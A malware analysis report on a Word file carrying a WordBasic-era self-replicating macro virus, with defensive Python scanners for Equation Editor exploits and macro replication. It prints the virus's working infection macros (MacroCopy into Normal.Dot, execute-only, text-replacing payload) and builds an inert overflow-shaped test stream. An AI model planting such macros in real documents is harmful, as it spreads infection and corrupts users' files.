Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 d422455ff1395204…

MALICIOUS

Office (OOXML)

Size: 2.10 MB | Created: 2014-10-29 10:08:00 UTC | Authoring application: Microsoft Office Word 15.0000 (Word 2013) | First seen: 2021-05-23
MD5: b94568aaee6b658da9a8092adafe4ebb
SHA-1: 95b6093b2eb56233e5a742c1b2b4803bc0881bcc
SHA-256: d422455ff1395204a725e94cd75b2893f9e68d10ef7664aac5b8474ea54450f6
Risk score: 242

Malware Insights

MITRE ATT&CK
T1059.005 (Command and Scripting Interpreter: Visual Basic); T1566.001 (Phishing: Spearphishing Attachment); T1203 (Exploitation for Client Execution)

The ClamAV hit (Doc.Trojan.Nop-5) and the AutoOpen heuristic agree with what the extracted VBA actually shows: a self-replicating Word macro virus of the Word 6/95 era, written in WordBasic and auto-converted to VBA (every statement goes through the WordBasic object, and the VB_Description attributes carry the Russian-language built-in command descriptions of the Word installation that did the conversion). The FileClose and DocClose modules override the built-in close commands: when a document is closed they run FileSaveAs, force the save format from 0 (document) to 1 (template) because Word 6/95 macros can only live in templates, and then call WordBasic.MacroCopy to copy FileClose, DocClose, FileOpen, HelpAbout and Internal (stored in the target under the name AutoOpen) from Normal.Dot into the document, with the third argument set to 1 (execute-only) so the copies cannot be viewed in the macro editor. FileOpen carries the payload: after opening a document it runs EditReplace to change every occurrence of 'Windows' to 'Sucks must die!'. HelpAbout changes the application name shown in the About dialog to 'Sucks!'. The AutoOpen module is cut off in the preview, so the step that seeds Normal.Dot from an infected document is not visible, though the Internal/AutoOpen naming implies that is its role. Nothing in the visible code downloads or runs anything from the network, and the visible macros never reference the embedded OLE objects, so a second-stage payload and an Equation Editor exploit are not supported by this sample. The T1203 mapping rests only on the Equation Editor CLSID finding below and should be treated as unconfirmed until the Equation Native streams of the embedded objects have been inspected.

Heuristics 6

  • Equation Editor OLE object (high, CVE related) OLE_EQUATION_EDITOR
    Embedded OLE object word/embeddings/oleObject71.bin contains the Equation Editor CLSID {0002CE02-0000-0000-C000-000000000046}, the legacy EQNEDT32.EXE component exploited by CVE-2017-11882, CVE-2018-0802 and CVE-2018-0798. The CLSID alone only shows that this is an Equation 3.0 object; it says nothing about whether the MTEF data inside it is malformed. Here all 31 embedded objects are 3072 or 3584 bytes, the creation timestamp (2014, forgeable but consistent with a Word 15 file) predates the public disclosure of all three CVEs, and the visible VBA never touches the objects, so ordinary equations are the likelier explanation. Confirm by parsing the "Equation Native" stream of each object (for CVE-2017-11882, the length of the FONT record's face name) rather than relying on the CLSID.
  • ClamAV: Doc.Trojan.Nop-5 (critical) CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Nop-5
  • VBA project inside OOXML (medium, 1 related finding) OOXML_VBA
    Document contains a VBA project (VBA macros present)
  • AutoOpen macro (high) OLE_VBA_AUTOOPEN
    An AutoOpen macro module is present; it runs without user interaction whenever the document is opened with macros enabled.
  • Embedded OLE object (medium) OOXML_OLE_OBJECT
    Document contains embedded OLE objects (31 parts under word/embeddings/, listed under Extracted artifacts)
  • Embedded URL (info) EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; the per-URL label says which channel (macro, JS, link annotation, document body, ...) reached it. Every URL below is an OOXML or Office XML namespace URI from the document's XML parts, not a network indicator: Word never connects to these addresses, so they should not be blocked, searched for in proxy logs or reported as IOCs. All 13 were found in document text (OOXML body / shared strings):
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas
    • http://schemas.openxmlformats.org/markup-compatibility/2006
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships
    • http://schemas.openxmlformats.org/officeDocument/2006/math
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main
    • http://schemas.microsoft.com/office/word/2010/wordml
    • http://schemas.microsoft.com/office/word/2012/wordml
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroup
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInk
    • http://schemas.microsoft.com/office/word/2006/wordml
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShape
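The OLE_EQUATION_EDITOR finding stops at the CLSID. The check a triager actually wants is whether the MTEF data inside the object is malformed in the way CVE-2017-11882 needs. The following scanner is an added example written for this report; it is not part of the analysis platform, of oletools or of olefile. It assumes the documented layout of an Equation 3.0 object (a CFB file whose "Equation Native" stream starts with the 28-byte EQNOLEFILEHDR, then a 5-byte MTEF header, then MTEF records, where a FONT record is tag 0x08, a typeface byte, a style byte and a NUL-terminated face name) and uses LF_FACESIZE (32 bytes including the NUL, the Windows limit on a font face name) as the threshold, since EQNEDT32.EXE copies the name into a fixed stack buffer and a longer name is both invalid and the overflow trigger. The two streams it runs on are constructed for the example, not taken from this sample's objects; `check_ole_object` is the hook for running it over the extracted `oleObjectNN.bin` files with olefile.

```python
"""Added example: look inside an Equation Editor OLE object for the
CVE-2017-11882 condition (an over-long FONT record face name) instead of
stopping at the CLSID. Stream layout and threshold are assumptions stated
in the lead-in; the two streams below are constructed test data."""
import struct

EQUATION_EDITOR_CLSID = "0002CE02-0000-0000-C000-000000000046"
EQNOLEFILEHDR_LEN = 28      # cbHdr, the first WORD of the stream
MTEF_HEADER_LEN = 5         # version, platform, product, product version, subversion
FONT_TAG = 0x08
LF_FACESIZE = 32            # Windows limit on a face name, NUL included


def scan_equation_native(stream: bytes) -> dict:
    """Heuristic scan of one "Equation Native" stream.

    MTEF records are variable-length and a 0x08 byte can occur inside other
    records, so every 0x08 whose name starts with printable text is treated
    as a candidate FONT record; only the name length decides. Other exploit
    paths in this component (e.g. the MATRIX record used by CVE-2018-0802)
    are not covered.
    """
    r = {"valid_header": False, "size_matches": False, "mtef_version": None,
         "font_names": [], "overlong_font_names": [], "suspicious": False}
    if len(stream) < EQNOLEFILEHDR_LEN + MTEF_HEADER_LEN:
        return r
    cb_hdr, version, _cf, cb_object = struct.unpack_from("<HIHI", stream, 0)
    mtef = stream[EQNOLEFILEHDR_LEN:]
    r["valid_header"] = cb_hdr == EQNOLEFILEHDR_LEN and version == 0x00020000
    r["size_matches"] = cb_object == len(mtef)   # cbObject should equal the MTEF length
    r["mtef_version"] = mtef[0]
    body = mtef[MTEF_HEADER_LEN:]
    pos = 0
    while (pos := body.find(bytes([FONT_TAG]), pos)) != -1:
        start = pos + 3                          # skip tag, typeface, style
        end = body.find(b"\x00", start)
        name = body[start:end if end != -1 else len(body)]
        if name and 0x20 <= name[0] < 0x7F:      # face names start with printable text
            text = name.decode("latin-1")
            r["font_names"].append(text)
            if len(name) >= LF_FACESIZE:
                r["overlong_font_names"].append(text)
            pos = start + len(name) + 1          # resume after this record's name
        else:
            pos += 1
    r["suspicious"] = bool(r["overlong_font_names"])
    return r


def check_ole_object(path: str) -> dict:
    """Run the scan on an extracted oleObjectNN.bin. Needs the third-party
    olefile package (pip install olefile); imported lazily so the scanner
    itself runs without it."""
    import olefile
    ole = olefile.OleFileIO(path)
    try:
        is_eqn = ole.root.clsid.upper() == EQUATION_EDITOR_CLSID
        if not is_eqn or not ole.exists("Equation Native"):
            return {"equation_editor_clsid": is_eqn, "equation_native": False}
        r = scan_equation_native(ole.openstream("Equation Native").read())
    finally:
        ole.close()
    r.update({"equation_editor_clsid": True, "equation_native": True})
    return r


def build_equation_native(face_name: bytes) -> bytes:
    """Constructed test data: EQNOLEFILEHDR + MTEF v3 header + FULL, LINE,
    FONT(face_name) and END records (tags 0x0a, 0x01, 0x08, 0x00)."""
    mtef = (b"\x03\x01\x01\x03\x0a"               # MTEF v3, Windows, Equation Editor
            + b"\x0a" + b"\x01"
            + bytes([FONT_TAG, 1, 1]) + face_name + b"\x00"
            + b"\x00")
    hdr = struct.pack("<HIHI", EQNOLEFILEHDR_LEN, 0x00020000, 0xC49E, len(mtef))
    return hdr + b"\x00" * 16 + mtef


BENIGN_STREAM = build_equation_native(b"MT Extra")
# Shape of the public CVE-2017-11882 proof of concept: a 44-byte "name" that
# overruns the buffer, then a 4-byte return address whose last byte (NUL)
# terminates the string. Inert filler here; no real address or command.
SUSPICIOUS_STREAM = build_equation_native(b"A" * 44 + b"\xde\xad\xbe")

if __name__ == "__main__":
    for label, s in (("benign", BENIGN_STREAM), ("suspicious", SUSPICIOUS_STREAM)):
        print(label, scan_equation_native(s))
```

For this sample, run `check_ole_object` over each `ooxml_oleobject_NN.bin` listed under Extracted artifacts; 31 objects that all parse cleanly with short face names and matching `cbObject` would settle the T1203 question far better than the CLSID hit does.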

Extracted artifacts 32

Files carved from inside the sample during analysis.

Columns: filename, kind, source, size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 5019 bytes
SHA-256: e040cf9088a23635f015629aaaca8261e4c26807e28632de04cdafbbecaaf83b
Detection: ClamAV Doc.Trojan.Nop-5
Obfuscation or payload: unlikely
Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "HelpAbout"

Rem ===============================================================
Rem Some Joke from this Macro.
Rem ===============================================================



Public Sub MAIN()
Attribute MAIN.VB_Description = "Отображает информацию о программе и номер версии"
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.HelpAbout.MAIN"
Rem VB_Description above, translated from Russian (the built-in HelpAbout command text of the Word installation that converted the macro): "Displays information about the program and the version number"

On Error GoTo -1: On Error GoTo Halt

WordBasic.HelpAbout APPNAME:="Sucks!"

Halt:
Err.Number = 0
End Sub

Attribute VB_Name = "FileClose"

Rem ==============================================================
Rem Invecting module of this Macro.
Rem ==============================================================



Public Sub MAIN()
Attribute MAIN.VB_Description = "Закрывает все окна активного документа"
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.FileClose.MAIN"
Rem VB_Description above, translated from Russian: "Closes all windows of the active document"
Dim W
Dim N$
Dim S$

On Error GoTo -1: On Error GoTo Halt

W = WordBasic.IsDocumentDirty()
Dim Dlg As Object: Set Dlg = WordBasic.DialogRecord.FileSaveAs(False)
WordBasic.CurValues.FileSaveAs Dlg
If Dlg.Format <= 1 Then
    If Dlg.Format = 0 Then
        Dlg.Format = 1
        WordBasic.FileSaveAs Dlg
    End If
    N$ = "Normal.Dot:"
    S$ = Dlg.Name + ":"
    WordBasic.MacroCopy N$ + "FileClose", S$ + "FileClose", 1
    WordBasic.MacroCopy N$ + "DocClose", S$ + "DocClose", 1
    WordBasic.MacroCopy N$ + "FileOpen", S$ + "FileOpen", 1
    WordBasic.MacroCopy N$ + "HelpAbout", S$ + "HelpAbout", 1
    WordBasic.MacroCopy N$ + "Internal", S$ + "AutoOpen", 1
    WordBasic.SetDocumentDirty W
End If


Halt:
Err.Number = 0
WordBasic.FileClose

End Sub

Attribute VB_Name = "FileOpen"

Rem ==================================================================
Rem Destructive operations from this Macro.
Rem ==================================================================



Public Sub MAIN()
Attribute MAIN.VB_Description = "Открывает существующий документ или шаблон"
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.FileOpen.MAIN"
Rem VB_Description above, translated from Russian: "Opens an existing document or template"

On Error GoTo -1: On Error GoTo Halt

Dim Dlg As Object: Set Dlg = WordBasic.DialogRecord.FileOpen(False)
WordBasic.CurValues.FileOpen Dlg
WordBasic.Dialog.FileOpen Dlg
WordBasic.FileOpen Dlg

WordBasic.EditReplace Find:="Windows", Replace:="Sucks must die!", ReplaceAll:=1

Halt:
Err.Number = 0
End Sub

Attribute VB_Name = "DocClose"

Rem ==============================================================
Rem Invecting module of this Macro.
Rem ==============================================================



Public Sub MAIN()
Attribute MAIN.VB_Description = "Предлагает сохранить активный документ и закрывает активное окно"
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.DocClose.MAIN"
Rem VB_Description above, translated from Russian: "Prompts to save the active document and closes the active window"
Dim W
Dim N$
Dim S$

On Error GoTo -1: On Error GoTo Halt

W = WordBasic.IsDocumentDirty()
Dim Dlg As Object: Set Dlg = WordBasic.DialogRecord.FileSaveAs(False)
WordBasic.CurValues.FileSaveAs Dlg
If Dlg.Format <= 1 Then
    If Dlg.Format = 0 Then
        Dlg.Format = 1
        WordBasic.FileSaveAs Dlg
    End If
    N$ = "Normal.Dot:"
    S$ = Dlg.Name + ":"
    WordBasic.MacroCopy N$ + "FileClose", S$ + "FileClose", 1
    WordBasic.MacroCopy N$ + "DocClose", S$ + "DocClose", 1
    WordBasic.MacroCopy N$ + "FileOpen", S$ + "FileOpen", 1
    WordBasic.MacroCopy N$ + "HelpAbout", S$ + "HelpAbout", 1
    WordBasic.MacroCopy N$ + "Internal", S$ + "AutoOpen", 1
    WordBasic.SetDocumentDirty W
End If


Halt:
Err.Number = 0
WordBasic.DocClose

End Sub

Attribute VB_Name = "AutoOpen"

Rem =================================================================
Rem StartUp Initialization.
Rem =====================================================
... (truncated)
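The report's heuristics fire only on the AutoOpen name; the stronger signals in the macro above are the MacroCopy calls between Normal.Dot and a document, the FileSaveAs format forced to 1 (template), the execute-only copies, a copy that lands under an auto-exec name (Internal installed as AutoOpen) and the EditReplace payload. The triage pass below is an added example written for this report, not part of oletools or of the analysis platform; it runs over olevba-extracted text and pulls those signals out. `SAMPLE_VBA` is an abridged excerpt of the macros.bas preview above; the function names, the constant propagation and the regular expressions are this example's own, and the string resolution handles only the simple `Var$ + "literal"` building seen in this sample (a literal containing `+` or `,` would not resolve).

```python
"""Added example: triage olevba output for the WordBasic-era self-replication
pattern (MacroCopy via Normal.Dot). SAMPLE_VBA is an abridged excerpt of the
extracted macro above; everything else is this example's own code."""
import re

AUTO_EXEC = {"AutoOpen", "AutoClose", "AutoExec", "AutoExit", "AutoNew",
             "Document_Open", "Document_Close"}
# Built-in Word commands that a macro of the same name silently replaces
HOOKED_COMMANDS = {"FileOpen", "FileClose", "DocClose", "FileSave",
                   "FileSaveAs", "ToolsMacro", "HelpAbout"}

MODULE_RE = re.compile(r'^Attribute VB_Name = "([^"]+)"', re.M)
ASSIGN_RE = re.compile(r'^\s*(\w+\$?)\s*=\s*(.+?)\s*$', re.M)   # plain "Var = expr" lines
MACROCOPY_RE = re.compile(r'MacroCopy\s+([^\n]+)')
EDITREPLACE_RE = re.compile(r'EditReplace\s+Find:="([^"]*)",\s*Replace:="([^"]*)"')


def _resolve(expr: str, consts: dict) -> str:
    """Evaluate 'N$ + "FileClose"' from the assignments seen so far; anything
    unknown (Dlg.Name, a function call) is kept as <expr> rather than guessed."""
    out = []
    for tok in (t.strip() for t in expr.split("+")):
        if len(tok) >= 2 and tok[0] == tok[-1] == '"':
            out.append(tok[1:-1])
        else:
            out.append(consts.get(tok, f"<{tok}>"))
    return "".join(out)


def split_modules(vba: str) -> dict:
    parts = MODULE_RE.split(vba)      # [prefix, name1, body1, name2, body2, ...]
    return {parts[i]: parts[i + 1] for i in range(1, len(parts) - 1, 2)}


def triage(vba: str) -> dict:
    modules = split_modules(vba)
    rep = {"modules": list(modules),
           "auto_exec_modules": sorted(m for m in modules if m in AUTO_EXEC),
           "hooked_commands": sorted(m for m in modules if m in HOOKED_COMMANDS),
           "wordbasic_converted": "WordBasic." in vba,   # Word 97 conversion artifact
           "macro_copies": [], "renamed_to_auto_exec": [], "edit_replace": [],
           "touches_global_template": False, "forces_template_format": False}
    for name, body in modules.items():
        consts = {}
        for var, rhs in ASSIGN_RE.findall(body):        # in order, so N$ resolves before use
            consts[var] = _resolve(rhs, consts)
        for args in MACROCOPY_RE.findall(body):
            a = [x.strip() for x in args.split(",")]     # MacroCopy Source$, Dest$ [, ExecuteOnly]
            src, dst = _resolve(a[0], consts), _resolve(a[1], consts)
            rep["macro_copies"].append({"module": name, "source": src, "destination": dst,
                                        "execute_only": len(a) > 2 and a[2] == "1"})
            if "normal.dot" in (src + dst).lower():
                rep["touches_global_template"] = True
            src_macro, dst_macro = src.rsplit(":", 1)[-1], dst.rsplit(":", 1)[-1]
            if dst_macro in AUTO_EXEC and src_macro != dst_macro:
                rep["renamed_to_auto_exec"].append((src, dst))
        if re.search(r"\.Format\s*=\s*1\b", body):      # FileSaveAs format 1 = template
            rep["forces_template_format"] = True
        for find, repl in EDITREPLACE_RE.findall(body):
            rep["edit_replace"].append((name, find, repl))
    rep["verdict"] = ("self-replicating macro virus (MacroCopy via Normal.Dot)"
                      if rep["macro_copies"] and rep["touches_global_template"]
                      else "no replication pattern found")
    return rep


# Abridged excerpt of the macros.bas preview from this report
SAMPLE_VBA = r'''
Attribute VB_Name = "FileClose"
Public Sub MAIN()
W = WordBasic.IsDocumentDirty()
Dim Dlg As Object: Set Dlg = WordBasic.DialogRecord.FileSaveAs(False)
If Dlg.Format <= 1 Then
    If Dlg.Format = 0 Then
        Dlg.Format = 1
        WordBasic.FileSaveAs Dlg
    End If
    N$ = "Normal.Dot:"
    S$ = Dlg.Name + ":"
    WordBasic.MacroCopy N$ + "FileClose", S$ + "FileClose", 1
    WordBasic.MacroCopy N$ + "DocClose", S$ + "DocClose", 1
    WordBasic.MacroCopy N$ + "FileOpen", S$ + "FileOpen", 1
    WordBasic.MacroCopy N$ + "HelpAbout", S$ + "HelpAbout", 1
    WordBasic.MacroCopy N$ + "Internal", S$ + "AutoOpen", 1
End If
End Sub
Attribute VB_Name = "FileOpen"
Public Sub MAIN()
WordBasic.EditReplace Find:="Windows", Replace:="Sucks must die!", ReplaceAll:=1
End Sub
Attribute VB_Name = "AutoOpen"
'''

if __name__ == "__main__":
    for k, v in triage(SAMPLE_VBA).items():
        print(f"{k}: {v}")
```

On the full macros.bas the same pass also reports the DocClose module (the second copy of the infection routine) and the HelpAbout hook; the `<Dlg.Name>` placeholder in the destinations is the honest output, since the target template name is only known at run time.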
ooxml_oleobject_00.bin ooxml-ole-object OOXML embedded OLE part: word/embeddings/oleObject155.bin 3072 bytes
SHA-256: c9241e87674c2c7ed263c65f4ffa6fe6d87e836758d36118ac7dd787c69514ac
ooxml_oleobject_01.bin ooxml-ole-object OOXML embedded OLE part: word/embeddings/oleObject71.bin 3584 bytes
SHA-256: e405ecf051739ef5a789431c65877568c981da0084cfc0aa5c355c143979fb57
ooxml_oleobject_02.bin ooxml-ole-object OOXML embedded OLE part: word/embeddings/oleObject126.bin 3584 bytes
SHA-256: 3346fa49f43a2589df6fdc88b62311f763cb242fb0a76f118fa4546e5f9e83a4
ooxml_oleobject_03.bin ooxml-ole-object OOXML embedded OLE part: word/embeddings/oleObject188.bin 3584 bytes
SHA-256: deb903ed55cae59c3d579c14435ce995e9d91e5d24dd88d2664287b98f08f998
ooxml_oleobject_04.bin ooxml-ole-object OOXML embedded OLE part: word/embeddings/oleObject87.bin 3072 bytes
SHA-256: 8b830d55ec202ac40f83707f1e2674824e2fcafda722b8216aa7a1527c28458b
ooxml_oleobject_05.bin ooxml-ole-object OOXML embedded OLE part: word/embeddings/oleObject116.bin 3072 bytes
SHA-256: 19a2b17e50e23a485ff28b97f1bd6b2d54dca33146df416341282208ec0ac475
ooxml_oleobject_06.bin ooxml-ole-object OOXML embedded OLE part: word/embeddings/oleObject38.bin 3072 bytes
SHA-256: 8e9b4da15943c15aac2dfc8cb4fe7be89435d90b2849c4aed52bc3aa19d9e18f
ooxml_oleobject_07.bin ooxml-ole-object OOXML embedded OLE part: word/embeddings/oleObject113.bin 3072 bytes
SHA-256: 7c35d1ffc9c9b4a7730efd42824ba11834606603a2401ff569952d18ab0f50a0
ooxml_oleobject_08.bin ooxml-ole-object OOXML embedded OLE part: word/embeddings/oleObject54.bin 3584 bytes
SHA-256: cb9569f0fa91764702e76c832716e91e9bff742f06f8a80c282784d48f9d38a1
ooxml_oleobject_09.bin ooxml-ole-object OOXML embedded OLE part: word/embeddings/oleObject139.bin 3072 bytes
SHA-256: 7653ad6b8fa55c708c5c5a8224d3291e743e4608ef0b43e27c1cda6ebded849e
ooxml_oleobject_10.bin ooxml-ole-object OOXML embedded OLE part: word/embeddings/oleObject149.bin 3072 bytes
SHA-256: 2ba5967452f69c4c10d3dab80dceac345c038d07936cdf9de246df7a224ce92e
ooxml_oleobject_11.bin ooxml-ole-object OOXML embedded OLE part: word/embeddings/oleObject45.bin 3072 bytes
SHA-256: bcf88047cd6ecfc550c6b0570b5bb643358674d6f6ababf23f2e066ab92ff306
ooxml_oleobject_12.bin ooxml-ole-object OOXML embedded OLE part: word/embeddings/oleObject182.bin 3072 bytes
SHA-256: 2cc9adba7cabf4058ddc4fdf3f7c6fbd5bec9d3f456d9c7dcaf0d33d51717a98
ooxml_oleobject_13.bin ooxml-ole-object OOXML embedded OLE part: word/embeddings/oleObject67.bin 3072 bytes
SHA-256: 9f29e6ecdddde43caf382f75a4e589659900cbcef53821518a9b8f7cfbf361f9
ooxml_oleobject_14.bin ooxml-ole-object OOXML embedded OLE part: word/embeddings/oleObject29.bin 3072 bytes
SHA-256: 3c24de16a44cba7269a68cdaebe2ad5b8de6844f29424ec4485f2ce149d4d853
ooxml_oleobject_15.bin ooxml-ole-object OOXML embedded OLE part: word/embeddings/oleObject32.bin 3072 bytes
SHA-256: 78341d8f443c694997276818905f010119b82da50031aa1a8b33f392f8ec88ab
ooxml_oleobject_16.bin ooxml-ole-object OOXML embedded OLE part: word/embeddings/oleObject160.bin 3072 bytes
SHA-256: 71fe05e68cc6e9e9c4413be4dbf1d4f547ffcf0d80dcac9366e0e5f737bc14d7
ooxml_oleobject_17.bin ooxml-ole-object OOXML embedded OLE part: word/embeddings/oleObject119.bin 3584 bytes
SHA-256: 5d973ed03049ce514df618a5c48523e5b96b90997a8666568657769ab51e838c
ooxml_oleobject_18.bin ooxml-ole-object OOXML embedded OLE part: word/embeddings/oleObject101.bin 3584 bytes
SHA-256: d1e4b3f2ed16b191238c9a19a3b7e8440e36354be3d558aec55831a6decc2641
ooxml_oleobject_19.bin ooxml-ole-object OOXML embedded OLE part: word/embeddings/oleObject84.bin 3584 bytes
SHA-256: 1d9c73a995cdb767a306967bc1ab197682d64c7f2952757b9bce927b2192d0a1
ooxml_oleobject_20.bin ooxml-ole-object OOXML embedded OLE part: word/embeddings/oleObject43.bin 3584 bytes
SHA-256: ea5925d79ede428a9eee143608991a530d6efb10240e71ab911d708e7c78091f
ooxml_oleobject_21.bin ooxml-ole-object OOXML embedded OLE part: word/embeddings/oleObject3.bin 3072 bytes
SHA-256: e85558e7951c79bed5fc5dc8ea6016c88c8b842fc215c3550eec687e9762513e
ooxml_oleobject_22.bin ooxml-ole-object OOXML embedded OLE part: word/embeddings/oleObject153.bin 3072 bytes
SHA-256: 546e8eb76c798b0bbca09014cf85cfd882aeef8c3672defcc6799e10c16a13f3
ooxml_oleobject_23.bin ooxml-ole-object OOXML embedded OLE part: word/embeddings/oleObject158.bin 3584 bytes
SHA-256: d82f522b41213835b4edf3d49ab0ab1535a0b1f8603c3cc1d6abe120594ac309
ooxml_oleobject_24.bin ooxml-ole-object OOXML embedded OLE part: word/embeddings/oleObject141.bin 3584 bytes
SHA-256: f4034febfcd159c1a9e4e40676fa479dbb5b08348d6f4a2b4df0bb80e540a1e8
ooxml_oleobject_25.bin ooxml-ole-object OOXML embedded OLE part: word/embeddings/oleObject176.bin 3072 bytes
SHA-256: b8aa8526a55d27b1a05b360c5240ddada00f1b2838debea7105776c2dbf71bf0
ooxml_oleobject_26.bin ooxml-ole-object OOXML embedded OLE part: word/embeddings/oleObject42.bin 3072 bytes
SHA-256: 0f849b23d2b11d7d2da3b37748b251b438d81adafd570e6a670865a621221668
ooxml_oleobject_27.bin ooxml-ole-object OOXML embedded OLE part: word/embeddings/oleObject49.bin 3584 bytes
SHA-256: 3fa4dc1bfcdec1c9d9f230e8d4c2aa0e66ce9a42ded3c732c16b00cf0f05c8f0
ooxml_oleobject_28.bin ooxml-ole-object OOXML embedded OLE part: word/embeddings/oleObject50.bin 3072 bytes
SHA-256: a731285d31e3aa0753f25de9959c2774dad663167f62b510c2e4c0b47347beef
ooxml_oleobject_29.bin ooxml-ole-object OOXML embedded OLE part: word/embeddings/oleObject14.bin 3072 bytes
SHA-256: 04994e4705eefb7361e5f3afb6cf42d4bf10e69d79279b701fc093267893a762
ooxml_oleobject_30.bin ooxml-ole-object OOXML embedded OLE part: word/embeddings/oleObject166.bin 3072 bytes
SHA-256: 41d9824d91bfbce76418cb776dab797d46d37df57856e08c9c4fe47f8dd9ae41